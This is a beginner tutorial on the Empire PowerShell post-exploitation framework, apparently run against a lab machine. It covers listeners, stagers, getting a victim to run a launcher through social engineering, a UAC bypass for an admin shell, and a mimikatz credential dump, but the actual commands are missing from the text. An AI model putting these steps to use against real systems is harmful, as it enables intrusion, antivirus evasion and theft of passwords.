Hacking with Empire – PowerShell Post-Exploitation Agent

Hello everyone and welcome to this beginner’s guide to Empire. According to their official website:

“Empire is a pure PowerShell post-exploitation agent” built on cryptologically-secure communications and a flexible architecture.

Empire – PowerShell post-exploitation agent

Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.”

In this tutorial we will be covering everything you need to know about this software, straight from installation to getting a shell and even getting admin access without letting the antivirus know!

Before starting with the action you need to know these four things:

Listener: listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker’s computer.

Stager: A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.

Agent: An agent is a program that maintains a connection between your computer and the compromised host.

Module: These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.

Methodology:

  1. Creating a listener.
  2. Starting a listener.
  3. Launching a PowerShell code using launcher.
  4. Executing code on victim’s machine.
  5. Interacting with agent.
  6. Executing various modules.
  7. Bypassing UAC to get admin access.

To get started, clone the following git repo using git clone:

Now move into the installed directory and run install.sh file.

Wait for it to complete installation. This might take a few seconds. It will prompt you for a password, enter anything.

In my case, my password was toor.

Once the installation is done, move back a directory and run empire using ./empire

Help command opens up all the essential options required initially.

As our methodology states, we will be creating a listener for our local machine first.

It will say that “no listeners are currently active” but don’t worry, we are into the listener interface now.

Creates a listener on the local port 80. If port 80 is already busy by a service like apache, please make sure you stop that service.

Note: Whenever you double click on tab, all the available options will appear, just like in all of Linux.

Hence, uselistener <tab><tab> shows me all the listenersand so on like that.

Above command will execute the listener. Then go back and use powsershell listener as shown in the below image.

All we have to do now is copy this powershell code into victim’s command prompt using social engineering. Let’s assume we have access of victim’s command prompt and we copied our code into his cmd.

As soon as you hit enter you will see an agent being active on your empire screen. After executing the malicious powershell code, go back again to the main menu with the command:

Here you will see 1 agent active.

You can also rename the agent’s name to a rather simple one using the rename command.

Now, to get an admin shell, run bypassuac command with help of following command.

List command can be used anywhere to see the list in current interface. Here it displayed a list of agents in agent’s interface.

Let’s rename the agent’s name to a rather simpler one, once again.

Now you can see that we got a new admin shell using bypassuac and we renamed it to adminraj

Let’s interact with adminraj now.

<tab><tab>helps us view all the options in the shell. There are several options which is quite helpful to for post exploitation. Such as info, job, list and etc as shown in the image.

Info: for all the basic details like IP, nonce, jitter, integrity etc.

Let’s try and run mimikatz to get the password of the user. Since, mimikatz won’t run on a normal guest user shell and will only run on admin shell; this also proves that we have to achieve admin access so that we can use mimikatz.

Hmmmm!! And the password is “123”for user raj.

Above command will dump the credentials or password of any user in both plaintext and its hash as well.

Another important command is the shell command.

To use the shell of the victim to run proper microsoft windows commands, we use this feature.

Eg: one such window’s cmd only command is netstat

As expected, it showed us all the ports in work currently on the machine!